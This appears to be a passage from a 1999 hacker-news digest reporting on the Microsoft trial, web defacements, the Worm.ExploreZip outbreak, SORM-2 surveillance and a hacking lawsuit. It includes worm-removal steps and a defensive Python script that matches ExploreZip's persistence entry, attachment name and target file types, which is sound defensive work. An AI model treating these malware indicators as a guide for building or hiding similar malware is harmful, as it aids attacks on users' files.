what the repercussions are of including the browser
with the operating system.
C|Net
http://www.news.com/News/Item/0,4,37649,00.htm
Wired
http://www.wired.com/news/news/politics/story/20139.html
C|Net's link seems to have died; here's the Wired story:
Will Curiosity Kill the Browser?
by Declan McCullagh
12:15 p.m. 10.Jun.99.PDT
WASHINGTON -- On the last day of the
government's case, the federal judge
overseeing the Microsoft antitrust trial
asked Thursday if including a browser
with Windows could weaken a computer's
security.
"Are there any security issues involved in
the choice of a browser [that may
increase] the risk of penetration by a
virus or something like that?" US District
Judge Thomas Penfield Jackson asked a
witness testifying for the government.
Edward Felten, a Princeton University
scientist, said that some
security-conscious network
administrators may prefer to have no
browsers on computers. Felten was the
last witness called by the government,
and Microsoft will call its rebuttal
witnesses starting Monday.
"Is there any way of absolutely assuring
security?" Jackson asked. He also
wondered which browsers are safer than
others.
Reading the portents in a judge's
questions is, of course, a perilous task.
Some wags in the press gallery suggested
that His Honor must be shopping for a
computer. Or was the
technology-impaired Jackson simply
confused?
But the theory, if true, that would be
most damaging to Microsoft goes like
this: Jackson is wondering what the
downsides are to Microsoft's decision to
include Internet Explorer with Windows.
This became an important question since
a decision last summer by an appeals
court, which unceremoniously overturned
Jackson's December 1997 decision on a
related Justice v. Microsoft case. In a
2-1 decision, the panel said judges should
be "deferential to entrepreneurs' product
design choices" and companies should be
free to integrate products as they see fit
-- so long as the improvements benefit
customers.
Jackson's comments could mean that he
plans to weigh whether or not Microsoft's
decision to integrate Internet Explorer
with Windows was, on the whole, a good
thing for the general public. Other
government witnesses earlier in the trial
have offered additional reasons why
welding IE into the operating system
reduces consumer choice.
Microsoft has claimed that including IE
produces a more useful product with
Internet functionality that third-party
software developers can rely on.
Jim Allchin, a Microsoft vice president,
testified that these features "simply
cannot be achieved through the use of
add-on products from third parties."
But Felten said there was no reason
Internet Explorer had to be shipped with
the operating system.
"Microsoft can deliver a version of
Windows 98 from which the Internet
Explorer browser has been removed and
deliver it in such a way that does not
affect the non-Web browsing functions of
Windows 98," he said.
The Justice Department pointed to a
January 1997 email message from Allchin
to Bill Gates that said another executive
wanted Win98 "minus IE 4.0 in June.... IE
4.0 can be added next year."
Felten claimed he had designed a program
that removes browsing capability from
Windows 98. But Microsoft had Felten
demonstrate it and showed him he had
not actually removed Web browsing
features.
The trial will continue on Monday when
Microsoft calls AOL's David Colburn as a
hostile witness. Microsoft said it will
challenge the credibility of Colburn, an
AOL executive who was a government
witness earlier.
@HWA
30.0 Web Defacements Hindering Open Government
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 11th 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
Eric Lundquist claims that web page defacements hold
back the development of a web accessible government
and that penalties for such actions should be
proportional to the damage caused. Getting people to
vote or file taxes online is difficult if government web
sites can't keep the intruders out.
MSNBC
http://www.msnbc.com/news/278369.asp
Hacking is no longer merely a prank
COMMENTARY: Hacking retards the growth of a
Web-accessible government and should hold penalties
proportional to the crime
By Eric Lundquist, PC Week
ZDNN
June 9 — Getting your site hacked used to be
simply an embarrassment. Your carefully
designed home page suddenly became a
billboard for lewdness, racism or whatever the
hacker desired to create. However, now — and
more so in the future — a hacked site is a public
indication that you are not ready to play in the
digital age. Companies and government
organizations are now realizing this, and hackers
who protest that a hack is a prank are finding
that a prank can result in a bunch of FBI agents
coming through the front door.
IN THIS DIGITAL AGE, your company — whether it
be an Amazon, E-Trade or some idea still forming — is
built on a brand, a process and an information infrastructure.
The way your site appears on the Web; the process by
which a Web visitor can maneuver and buy products; and
the ability of your site to scale, connect to suppliers and
customers, and securely maintain a digital relation will
determine your success.
Sites that scale and allow you to shop comfortably in a
digital store can quickly extend their brands from books to
auctions to pet foods and beyond.
Sites that crumble while you and the rest of the
panicked investment community try to bail out on a stock
will find themselves abandoned and facing a new realm of
legal liabilities. Hacked sites visibly and fundamentally shake
the faith in the brand and the products being offered at the
digital storefront.
This loss of faith in the brand carries over to and is
magnified in the government realm. Internet access is on the
verge of becoming sufficiently ubiquitous to allow
organizational functions to move to the Web.
If the first big thing the Web allowed was personal
access and community building from the ground up, the next
big thing is allowing existing organizations to use the Web to
assume previously cumbersome functions. Vote on the
Web? Sure. Register your car via the Web. File your taxes.
Get your refund. All these functions are certainly possible.
What is missing is trust. Trust is a difficult dimension to
describe, but it most clearly is apparent in its absence.
Don’t ask a citizenry to register to vote via the Web if the
government’s top legal agencies can’t keep their home
pages free from graffiti.
And it is the trust that is shaken when the White House
site is hacked. Or the FBI site. Or the Senate site. Hacking
is more than breaking a few minor laws. Hacking is certainly
not just being a good digital citizen by showing the security
gaps that now exist to prevent more serious transgressions
in the future.
Hacking is neither clever nor funny, nor something to
be tossed off as adolescent humor from sci-fi-addled minds.
Hacking retards the growth of a Web-accessible
government and should hold penalties proportional to the
crime.
31.0 Worm.ExploreZip Continues its Rampage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by nvirB
After forcing some companies to completely shut down
their networks and keeping some administrators at work
all weekend people are bracing for Worm.ExploreZip to
resurface with a vengeance today as employees return
to work. While Worm.ExploreZip has the fast spreading
capabilities of Melissa it also contains a very destructive
payload that can delete files. IT administrators are
bracing for the expected onslaught of inevitable
mutations.
MSNBC
http://www.msnbc.com/news/278660.asp
Nando Times
http://www.techserver.com/story/body/0,1634,59360-94597-674149-0,00.html
C|Net
http://www.news.com/News/Item/0,4,37697,00.html?st.ne.fd.tohhed.ni
FBI and NIPC On the Hunt
The FBI is hot on the trail looking for the creator of
Worm.ExploreZip. This is probably more of a PR stunt
than anything. The odds of them actually finding
whoever created this are slim to none.
ZD Net
HTTP://www.zdnet.com/zdtv/cybercrime/viruswatch/story/0,3700,2274493,00.html
Wired
http://www.wired.com/news/news/technology/story/20168.html
Mac Vulnerable Too
Symantec Utilities is claiming that if a Mac user runs
Windows emulation software, names files with .doc,
.ppt, .xls, etc..., and either checks his mail under
emulation or is on a mixed environment network it is
possible to contract this worm. (Ed Note: Any Mac user
who is running this brain dead setup deserves to be
infected.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2274574,00.html
C|Net;
How the email worm works
By Stephen Shankland
Staff Writer, CNET News.com
June 10, 1999, 6:15 p.m. PT
The Worm.ExploreZip virus, while different in some functional details from the Melissa virus that hit in March, takes
advantage of a similar vulnerability: The fact that so many people now routinely use email.
The new virus emerged this week, spreading from user to user by taking advantage of automation features available to users of
Microsoft email software on Windows machines.
Like Melissa, it requires some active participation of the victim: opening the malicious file, or
"payload," attached to the email message. And again like Melissa, the malicious program then
modifies the victim's computer system to send more copies of itself automatically by email.
To encourage a person to open the attachment, both malicious programs use a similar ploy:
Trick the victim into thinking he or she has just received a useful document from a trusted source.
Both programs can get away with this, because the infected email comes from a person likely to
be known by the recipient.
But there the differences end. Where Melissa was relatively benign to users, Worm.ExploreZip
deletes Microsoft Word, Excel, and Powerpoint document files, said Wes Wasson, head of
security products marketing at Network Associates.
Where Melissa tapped into address books set up in Microsoft Outlook, Worm.ExploreZip's modus
operandi is just to bounce back incoming email automatically with a response including the
malicious program, Wasson said.
That means Worm.ExploreZip will spread more slowly, he said. "How fast it spreads correlates to
how many emails you get," he said.
Melissa, on the other hand, sent itself to 50 entries in the address book, and those entries
themselves could each be mailing lists.
Regardless of their propagation rate, both viruses depend on automated email features.
Worm.ExploreZip basically uses a modified version of the same feature that allows a person on vacation to set up email software
to automatically reply with an "try back later" message, Wasson said.
The advent of email as a distribution mechanism has allowed a new class of viruses, Wasson said. In the old days, viruses had to
be smaller, but Worm.ExploreZip is comparatively huge at more than 200 kilobytes, he said.
"Now with email, I don't have to be slim like I was before," Wasson said. "Viruses and worms can be
written in [the programming language] C. This is really cutting-edge science."
The increasing power of email viruses means that sophisticated hackers who once looked down on
viruses now see them as powerful tools to obtain information stored on target computers, particularly
because using email makes it easier to obscure the origin of the attack, he said.
"The hacker believes the virus is going to be more of a stealth approach," he said.
Selling security
Antivirus software sellers profit from virus scares. Sales of antivirus software jumped 67 percent in
the week the Melissa virus hit, according to market research firm PC Data.
Network Associates' Wasson acknowledges the sales boost, but insists his company is out there
to help people, pointing as evidence to the company's free, virus clinic detection services available
over the Internet.
"Rather than hold [people] hostage and take advantage of an incident, we'll give it to them for free," he said.
Network Associates' competitor TrendMicro offers a similar service.
As more companies begin to become more wary of the risks posed by the Internet, Network Associates is offering more security
consulting services. For example, the company hires itself out to find vulnerabilities in computer systems, Wasson said.
"Customers come to us all the time, saying check my security out, bang on my firewall," he said, referring to the protective
software designed to keep computer networks safe from unauthorized access.
In addition, the company is offering new software next month called CyberCop Sting that not only sets off alarms when there's a
burglar, but also lets companies set up decoy systems to lure intruders and record information about them, Wasson said. The
strategy is similar to the technique described by author Clifford Stoll in his book, The Cuckoo's Egg: Tracking a Spy Through the
Maze of Computer Espionage.
-=-
FBI investigating email worm
By Tim Clark
Staff Writer, CNET News.com
June 11, 1999, 3:00 p.m. PT
update In the wake of yesterday's attack by the virulent Worm.ExploreZip virus, the FBI said it is investigating the case
as a possible crime.
"As was the case with Melissa, the transmission of a virus can be a criminal matter, and the FBI is investigating," said Michael
Vatis, director of the National Infrastructure Protection Center (NIPC).
Vatis said the worm has the potential of doing significant damage to private sector and government computer systems. (See
CNET Topic Center on antivirus software.)
"It is critical for computer users to be aware of and take the well-publicized steps to protect against and mitigate potential damage
caused by malicious code," he said in a statement released this afternoon.
He added that transmission of malicious code can be a federal criminal offense and that the FBI is "aggressively investigating" the
matter.
The National Infrastructure Protection Center is monitoring developments and coordinating field office investigations, he said,
urging victims of the virus to contact the FBI field office nearest them, or the NIPC Watch and Warning Unit, which can be
reached by email at nipc.watch@fbi.gov.
"Because of the destructive payload delivered by this virus, its potential impact is significant," Vatis said. "All email users should
exercise caution when reading their email for the next few days and bring unusual messages to the attention of their system
administrator."
After the Melissa virus outbreak that began March 26, the FBI joined other agencies to identify and track down whoever had
created, then spread the virus. On April 1, a 30-year-old New Jersey man, David L. Smith, was arrested by federal and state
officials and charged in the case. He has pleaded not guilty and his case is still pending.
-=-
Data virus forces email shutdowns
By Kim Girard
Staff Writer, CNET News.com
June 10, 1999, 7:10 p.m. PT
update Corporations are scrambling to cope with a new data-destroying virus that is forcing the shutdown of email
systems nationwide.
The virus, first reported to the Symantec Antivirus Research Center on Sunday by five companies in Israel, is called
Worm.ExploreZip or Troj_Explore.Zip. The worm uses Messaging Application Programming Interface (MAPI) calls and Microsoft
Outlook on Windows systems to propagate itself, Symantec said.
In some ways, the virus is the sequel to the Melissa virus, which spread with unprecedented speed in March. Worm.ExploreZip
spreads from computer to computer by taking advantage of automation features available to people using Microsoft email software
on Windows machines.
Although the new virus doesn't spread as fast as Melissa, it causes more damage, according to antivirus experts, deleting
Microsoft Word, Excel, and PowerPoint document files, among others. (See CNET Topic Center on antivirus software.)
Several firms have shut down their email systems entirely while IS staff root out the virus,
according to Symantec.
Boeing was hit particularly hard. The Seattle-based aerospace giant shut down its email system,
which is used by at least 150,000 employees, at 2:30 p.m. today, a company spokesman said.
The company was still assessing the damage caused by the virus, but the spokesman, who
asked not to be named, said he knew of at least one employee whose entire hard drive was wiped
out.
"As soon as we became aware of it, we told everyone, and we put a message up on our internal
Web site," he said. Late in the day the email still had not been restored. The company hopes to
have it back up by tomorrow.
PricewaterhouseCoopers took down its entire email system, used by 45,000 U.S. employees,
also at 2:30 p.m. in response to the virus. The company was just bringing up parts of the system
at 7 p.m., a company spokesman said, but he didn't know how much damage had been done or
how many workers had been affected.
Some companies said they disarmed the virus--actually a software "worm"--before it could cause
many problems. Microsoft, for example, disconnected its email servers from the Internet at about 9
a.m. so that programmers could work on an antidote, company spokesman Dan Leach said. The
servers were up and running two hours later, he added.
Employees of antivirus software maker Symantec report that they have received email that
includes the worm, which arrives as an attachment to the missives. Companies such as General
Electric and Southern Company have had files deleted by the virus, according to Bloomberg.
Virus protection firm Trend Micro spokeswoman Susan Orbuch said earlier today that the company had received 107 calls from
customers concerning the virus. Thirteen of those calls came from those already infected, she said.
Orbuch said that Trend Micro knew of five large companies that had been infected, as well as several public relations firms and a
magazine. She declined to name the companies.
Nate Meyer, spokesman for Credit Suisse First Boston, said the virus had struck the company's
offices in New York, San Francisco, and Palo Alto, California, and that other offices worldwide may
have been affected. He said he did not know how many of the company's computers were infected.
Meyer said the Credit Suisse's technology department had been working on the problem for much of
the day and had sent out a warning about it this morning. But he said the virus did not seem to have
slowed the company's operations, adding that it had not disrupted the investment company's stock
trading. Meyer noted that his own email had been working throughout the day.
Quick repairs
Representatives at AT&T and Intel reported that they were able to quickly repair their systems after
being hit by the virus.
"These are things that we have to do because of the communications reality that we live in today,"
an AT&T spokeswoman said.
The virus disrupted work at Cambridge, Massachusetts-based industry analyst firm Forrester
Research, where Internet access, including email, was cut off. Another analyst firm, Current
Analysis, sent email to customers warning them not to open any email attachments coming from the
firm with the .exe extension because an employee's PC had been infected.
The infected email may contain the message: "Hi [recipient name]! I received your email and I shall send you a reply ASAP. Till
then, take a look at the attached zipped docs. bye."
Unlike the Melissa virus, which harvested from a user's address book, the new virus raids an email in-box when executed through
Microsoft Exchange or Outlook. The worm attaches itself as a file called zip_files.exe and is sent off with a return email. Although
the virus isn't expected to spread as quickly and to as many computers as Melissa did, it does destroy files.
"It's an .exe file posing as a Zip file," said Eric Chien, senior researcher at the Symantec Antivirus Research Center. The worm is
particularly insidious because it searches through hard drives and destroys files with extensions of .doc, .xls, .ppt, .c, .cpp, .h, or
.asm, he said.
Chien said that means whoever wrote the virus was targeting corporations--seeking to destroy developers' source code, as
well as documents created using Microsoft Office applications, such as Word and Excel.
"It singles out those files and destroys them," he said. "This hits the local drive and the file server."
Extent of damage not known
Chien said it is unclear how much damage the virus has done. "We've received multiple reports from major corporations in
the U.S.," he said. "What we're hoping is that the initial jump on this Sunday night will prevent it from spreading."
Panda Software said it has added free downloads for the detection and disinfection of the virus--which it called "extremely
dangerous"--on its Web site. The company also urged people to update antivirus software.
Esther Shin, a public relations specialist at Aventail, a Seattle-based business-to-business e-commerce firm, said two of
her colleagues encountered the virus this morning. One of them lost all the files on his hard drive after he opened the
attachment, she added.
The email was worded to make the recipient believe that the message came from a Microsoft employee, she said. Shin
said she got a similar email but didn't open the attachment.
"When I got hit I called all my contacts," she said.
Bloomberg and News.com's Troy Wolverton, Dan Goodin, and Tim Clark contributed to this report.
-=-
31.1 Removal of the Worm.ExploreZip virus (from MSNBC insert)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HOW TO GET RID OF IT
If your computer is infected, security software company
Network Associates recommends these steps to remove it:
- If you’re running Windows 95 or 98:
Restart your computer in MS-DOS mode, edit the
WIN.INI file and remove the line
run=c:\windows\system\explore.exe.
Then delete the file c:\windows\system\explore.exe and
restart Windows.
- If you’re running Windows NT:
Run REGEDIT (not REGEDT32), locate the key
[HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Windows] and delete the value named "run"
whose data is C:\WINNT\System32\Explore.exe (a REGEDIT export
shows it with doubled backslashes as
run=C:\\WINNT\\System32\\Explore.exe).
Restart Windows NT, then remove the file
c:\winnt\system32\Explore.exe
- If you’re unsure whether you’ve been infected, Network
Associates recommends that you look in your My Documents
folder to see whether you’re missing any familiar files, or look
in the Sent Messages folder in your e-mail client to see if you
are sending replies with attachments that you do not remember
sending.
Network Associates’ Gullotto warned that if this worm
follows the pattern of recent malicious attachments, network
administrators and users should be alert to e-mails that are
suspicious but do not match exactly the characteristics of
Worm.ExploreZip. Variants and copycats of malicious
software often appear soon after the original.
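The articles above name three artefacts an administrator can check for: the run= entry that starts the dropped explore.exe, the zip_files.exe auto-reply with its canned text, and the missing .doc/.xls/.ppt/.c/.cpp/.h/.asm files. The script below is an added example (not code from the original page, Network Associates or MSNBC) that implements those checks on constructed sample data; the WIN.INI text, the REGEDIT export, the sample message and the function names are all assumptions made for the example, not captures from a real host.

```python
# Added example (not code from the original page, Network Associates or
# MSNBC): checks for the ExploreZip artefacts the articles above describe,
# run here against constructed sample data rather than a live machine.
import email
import ntpath
import re
from email import policy

# Indicators quoted in the articles: the dropped program started through a
# "run=" entry, the attachment name and body text of the auto-replies, and
# the extensions of the files the worm destroys.
WORM_BINARY = "explore.exe"
WORM_ATTACHMENT = "zip_files.exe"
WORM_BODY_MARKER = "take a look at the attached zipped docs"
TARGET_EXTENSIONS = {".doc", ".xls", ".ppt", ".c", ".cpp", ".h", ".asm"}

_SECTION_RE = re.compile(r"^\[(.+)\]\s*$")
_KV_RE = re.compile(r'^"?([^"=]+)"?\s*=\s*"?(.*?)"?\s*$')


def find_run_persistence(text):
    """Scan WIN.INI text or a REGEDIT (.reg) export for run= entries that
    start the worm's dropped executable.

    Both formats are INI-like: "[section]" headers followed by key=value
    lines. A .reg export quotes name and data and doubles backslashes,
    which is why the removal note shows C:\\\\WINNT\\\\System32\\\\Explore.exe.
    Returns [(section, value)] for each suspicious run= line.
    """
    hits = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        m = _KV_RE.match(line)
        if not m or m.group(1).strip().lower() != "run":
            continue
        value = m.group(2).replace("\\\\", "\\")  # undo .reg escaping
        # WIN.INI run= may list several programs separated by spaces.
        if any(ntpath.basename(p).lower() == WORM_BINARY for p in value.split()):
            hits.append((section, value))
    return hits


def worm_reply_indicators(raw_message):
    """Parse one RFC 822 message (e.g. from Sent Items) and report whether it
    carries the worm's attachment and/or its canned reply text."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    attachment = any(
        (part.get_filename() or "").lower() == WORM_ATTACHMENT
        for part in msg.iter_attachments()
    )
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content().lower() if body is not None else ""
    body_hit = WORM_BODY_MARKER in text
    return {"attachment": attachment, "body_text": body_hit,
            "suspect": attachment or body_hit}


def missing_targeted_files(known_files, present_files):
    """Files from an earlier inventory that are now gone and carry one of
    the extensions the worm targets (the "missing familiar files" check)."""
    gone = set(known_files) - set(present_files)
    return sorted(f for f in gone
                  if ntpath.splitext(f)[1].lower() in TARGET_EXTENSIONS)


# Constructed sample data for the checks above (not captured from a real host).
SAMPLE_WIN_INI = r"""[windows]
load=
run=c:\windows\system\explore.exe
[Desktop]
Wallpaper=(None)
"""

SAMPLE_REG_EXPORT = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load"=""
"run"="C:\\WINNT\\System32\\Explore.exe"
"""

SAMPLE_SENT_ITEM = """\
From: alice@example.com
To: bob@example.com
Subject: RE: budget figures
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="sep"

--sep
Content-Type: text/plain; charset="us-ascii"

Hi Bob! I received your email and I shall send you a reply ASAP. Till
then, take a look at the attached zipped docs. bye.
--sep
Content-Type: application/octet-stream; name="zip_files.exe"
Content-Disposition: attachment; filename="zip_files.exe"
Content-Transfer-Encoding: base64

bm90IGEgcmVhbCBleGVjdXRhYmxl
--sep--
"""

if __name__ == "__main__":
    print(find_run_persistence(SAMPLE_WIN_INI))
    print(find_run_persistence(SAMPLE_REG_EXPORT))
    print(worm_reply_indicators(SAMPLE_SENT_ITEM))
    print(missing_targeted_files(["q2.xls", "notes.txt", "main.c"], ["notes.txt"]))
```

On a real machine you would feed find_run_persistence the contents of C:\WINDOWS\WIN.INI or of a REGEDIT export of the key named above, and worm_reply_indicators each message exported from Sent Items; a hit on either is the signal to follow the removal steps, and a non-empty missing_targeted_files result is the reason to restore from backup rather than hope the files are recoverable.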
@HWA
32.0 Senate web site hacked again(!)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
Senate Web Site Attacked, Again!
contributed by FedWatcher
For the second time in almost as many weeks the
official web site of the US Senate has been defaced. A
group known as The Varna Hacking Group from Bulgaria
claimed responsibility. (Mirror provided by attrition.org)
Wired
http://www.wired.com/news/news/politics/story/20180.html
MSNBC
http://www.msnbc.com/news/279233.asp
AP via Yahoo
http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990611/tc/senate_hackers_1.html
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
Wired;
US Senate Cracked Again
by Polly Sprenger
4:30 p.m. 11.Jun.99.PDT
For the second time in two weeks,
crackers on Friday defaced the Web page
of the US Senate.
The official Senate Web site was down as
of Friday afternoon while administrators
repaired and restored the network. A
cracker replaced the official page with
one that said "free Kevin Mitnick, free
Zyklon."
An employee of US Senate Technical
Operations said the site went down
around 4 p.m. EST, but couldn't say when
the site might come back up.
"Those of us who haven't been hacked
yet are just trying to lay low and beef up
security as we can," said Sean Donelan, a
network engineer for Data Research
Associates, a nationwide Internet service
provider that works with state
governments, libraries, and schools.
Donelan said that each government
agency is having to reinforce security
independently and that outside vendors
working with the government
departments consider their security
solutions proprietary.
"[We] are also trying not to attract
attention and not waving a red flag
challenging anyone to 'test' our security,"
Donelan said.
The Senate home page was previously
cracked on 27 May. In that incident,
crackers filled the page with comments
critical of the FBI. That hack was claimed
by the group Masters of Downloading,
who broadcast the message "MAST3RZ
0F D0WNL0ADING, GL0B4L D0MIN8T10N
'99!" on the Senate's site.
The Varna Hacking Group claimed
responsibility for the latest Web
vandalism. The organization claims it is a
"noncommercial hacking group." Varna is
based in Bulgaria, according to reports of
a 1998 attack that members claimed to
have launched against the Cartoon
Network.
Zyklon, mentioned in Friday's incident, is
alleged to be a 19-year-old hacker from
Shoreline, Washington. He was indicted in
early May for his alleged involvement in
other government site hacks.
Many of the recent hacks demanded
justice for imprisoned cracker Kevin
Mitnick, who has been in jail for more
than four years awaiting trial on a broad
swath of criminal charges.
@HWA
33.0 Mitnick Sentencing Hearing Rescheduled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Macki
This weekend Judge Pfaelzer granted Kevin Mitnick's
defense a continuance, postponing tomorrow's
previously scheduled sentencing hearing until July 12th.
This will give the defense time to verify the damage
claims which may be upwards of $80 million. Although it
is not known for sure some people have speculated that
the recent demonstrations (including a recent LA Times
article on them) may have influenced Judge Pfaelzer to
grant this request. She refused to hear a similar motion
just days before the demonstrations. It is interesting to
note that July 12th is the Monday after Defcon.
FREE KEVIN
http://www.kevinmitnick.com/home.html
Letters Claiming Damage Amounts
http://www.hackernews.com/orig/letters.html
34.0 Russia Looks to Beef Up its Version of Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Merlock
Russia has recently leaked a story concerning its version
of Echelon (the North American spy network system)
called SORM (System for Operational-Investigative
Activities). This group has been around for over a year
now, but a new development has civil rights leaders in
Russia scared. "SORM-2" will require all Russian ISP's to
install black-box recording devices at their POPs at the
ISP's expense!!! Russian web users have exclaimed that
they have been spied on for years, only now they are
going to have to pay for it.
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/russiansonline990612.html
Russians Fight for Net Privacy
Christopher Hamilton
Special to ABCNEWS.com
ST. PETERSBURG, June 11 — In Russia, the
Internet and free are words not necessarily
found in the same sentence.
Russian Internet users continue to struggle against a
state security system mired in Soviet-era attitudes toward
the free flow of information. The latest outrage: a
ministerial act put forward by the Federal Security Service
(FSB in its Russian acronym), the successor to the KGB.
The act would boost the ability of law enforcement to
monitor citizens’ Internet activities.
The new act represents an addendum to an existing
regulation called SORM — the Russian acronym for
System for Operational-Investigative Activities. Currently
awaiting approval from the Russian Ministry of Justice,
SORM-2 would require Internet service providers to
install at their own expense FSB-provided “black boxes”
plus a hotline to the FSB. The devices would enable the
FSB to monitor and record all electronic communications.
Because SORM-2 is a regulation, it requires only
approval from the Ministry of Justice, not review by
Parliament or President Yeltsin. Existing law already
affords the state security apparatus plentiful
eavesdropping possibilities once a warrant is issued.
SORM-2 would expand those capabilities, making full
electronic surveillance as easy as a mouse click for the
FSB.
‘Steps Toward Totalitarianism’
News of SORM-2 was leaked
late last year on the Moscow
Libertarium, a digital-freedom
Web site sponsored by the
Institute for Commercial
Engineering in Moscow.
“SORM-2 is a step toward
removing the checks and
balances between public and
the state,” says Anatoly
Levenchuk, who operates the
Libertarium site. “First they will
start investigations without warrants. Then they will decide
who is guilty without a trial…These are steps toward
totalitarianism.”
“The FSB is used to collecting dossiers on citizens just
in case,” said Yuri Vdovin of Citizen’s Watch, a St.
Petersburg-based human rights organization. “They have
been spying on us for years, but now I am going to have
to pay for it.”
Russian ISPs have already begun to feel the chill.
Bayard-Slavia Communications, a Volgograd-based ISP
that has repeatedly refused to provide information to the
FSB without a warrant, was disconnected from its
network provider in mid-May. The state communications
agency, Goskomsvyaz, cited “improper formulation” of
the company’s contract with the provider,
Moscow-Teleport. Company director Nail Murzhanov
has assembled a team of prominent activists and lawyers
in St. Petersburg and vows to take the matter to court.
Eugene Prygoff of Kuban Net, based in Krasnodar,
also reports FSB pressure. “Things here in the provinces
aren’t like in Moscow and Petersburg. They come and
ask for full access to our clients’ e-mail. Sure, we ask for
a court order and an explanation, but they have power in
the structures that own the ISDN line, so we have to
comply.”
Turning to Encryption
Hoping to prevent invasions of their privacy, many
Russian Internet users are turning to encryption.
According to Maksim Otstavnov, who maintains the
Russian Web site for the encryption program PGP, or
Pretty Good Privacy, hits increased about 10-fold after
news of SORM-2 was leaked to the public last year. But
the official status of cryptography in Russia remains
unclear. In 1995, Yeltsin banned the use of PGP and
other forms of encryption unless it is licensed and
registered with FAPSI, the Russian equivalent of the U.S.
National Security Agency. Whether his decree legally
applies to private citizens is a matter of debate.
The murky state of the law and the lack of public
disclosure leaves citizens uninformed about laws that
affect them. Citizen’s Watch has held numerous seminars
on issues surrounding SORM and computer privacy.
“We need to educate people and get them involved,”
said Vdovin.
Vdovin and Citizen’s Watch are drafting proposals for
the State Duma, Russia’s lower house of Parliament, to
create a system of checks and balances to rein in the
FSB’s domestic spying activities. Meanwhile the shadowy
struggle between the security agency and Internet service
providers continues. According to Anatoly Levenchuk,
“The FSB is already trying to establish ‘volunteer’
agreements similar to SORM-2 with providers. ISPs
failing to comply face pressure tactics ranging from
repeated visits from tax police to building inspectors
threatening to shut them down.”
In Russia, the state has always fought for access to its
citizens’ private communications, while citizens have
fought back as best they could. The battle over Internet
privacy could determine who’s winning this ongoing
struggle.
35.0 Company Claims CyberAttack by Competitor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Seraphic Artifex
Lenox Healthcare Inc. is claiming that its competitor
Vencor Inc. engaged in "dead of night computer
hacking" according to a lawsuit filed in Los Angeles
County Superior Court in California. These actions are
allegedly in retaliation for Lenox's cooperation with a
government investigation of Vencor. The lawsuit claims,
among other things that Vencor broke into Lenox
Healthcare's computer system to prevent Lenox from
processing medical bills. (It will be interesting to see if
these claims can be proven in court.)
The Berkshire Eagle
http://search.newschoice.com/nebe/eagleheadlines/99-06-08_clarkesues08a1.asp
Lenox Healthcare suing major nursing home firm
Tuesday June 08, 1999
By Ellen G. Lahr
Berkshire Eagle Staff
PITTSFIELD -- Lenox Healthcare Inc. is suing one of the biggest U.S. nursing home companies, Vencor Inc., for engaging in extortion, death threats
and "dead of night" computer hacking, allegedly in retaliation for Lenox's cooperation with a government investigation of Vencor.
Vencor Inc., a publicly traded company with more than 300 nursing homes and 60 hospitals around the country, carried out "oppressive, unlawful
and often maniacal actions" against Lenox Healthcare, according to a lawsuit filed in Los Angeles County Superior Court in California.
The lawsuit also accuses a Vencor company lawyer of "threatening to appear at [Lenox Healthcare's] office with a gun and 'blow away' " Lenox
Healthcare President Thomas M. Clarke if Clarke didn't make certain payments to Vencor.
Efforts to gain comment from Vencor and its California attorney were unsuccessful yesterday.
Both Clarke and his lawyer also declined to comment.
$28 million deal
Vencor and Lenox Healthcare have been locked in a web of contracts since Lenox Healthcare purchased or leased 30 of Vencor's facilities in 1996 in
a $28 million business deal. About half of the facilities purchased or leased are concentrated in California.
The lawsuit states that Vencor reneged on millions of dollars allegedly owed to Lenox Healthcare, and fraudulently compelled Clarke to pay $8.7
million for a California nursing facility that was worth far less.
Vencor is teetering on the edge of bankruptcy because of an array of regulatory and financial problems, according to financial reports and the
company's own annual report.
The case also claims that:
- After the 1996 business deal was completed, Vencor received millions of dollars in Medicare and Medicaid payments that should have gone to
Lenox Healthcare. Vencor eventually turned over some $4 million to Lenox, but has retained nearly $1 million more.
- Vencor allegedly broke into Lenox Healthcare's computer system to prevent Lenox Healthcare from processing medical bills, "thereby allowing
Vencor to capitalize on the resulting interim financial crisis by extorting" money from Lenox Healthcare.
- Vencor allegedly tried to cut off Lenox Healthcare's receipt of pharmaceutical supplies and therapy services "as a means of extorting further
monies" from Lenox Healthcare.
- The lawsuit also states that Vencor officials spread rumors that Lenox Healthcare was on the verge of bankruptcy, threatened to take over the
business and placed Clarke under "extreme duress."
- Vencor also is accused of undermining Lenox's efforts to obtain bank financing to offset losses created by Vencor's actions.
Lenox claims that the crux of the case involves its cooperation with federal investigators who were probing Vencor's alleged Medicare fraud
schemes.
After the 1996 deal, Vencor retained contracts with Lenox Healthcare to provide certain rehabilitation services to the nursing home patients. Under
the deal, Vencor would provide services such as physical and occupational therapies and then bill the nursing home for the services. The nursing
home would bill Medicare and reimburse Vencor when payments were received.
According to the suit, Lenox Healthcare discovered that Vencor was "padding its bills" for rehabilitation services. Vencor, the lawsuit says, billed the
nursing home for therapeutic services when staff member were actually engaged in marketing and administrative tasks.
Other billing fraud was common as well, said the lawsuit.
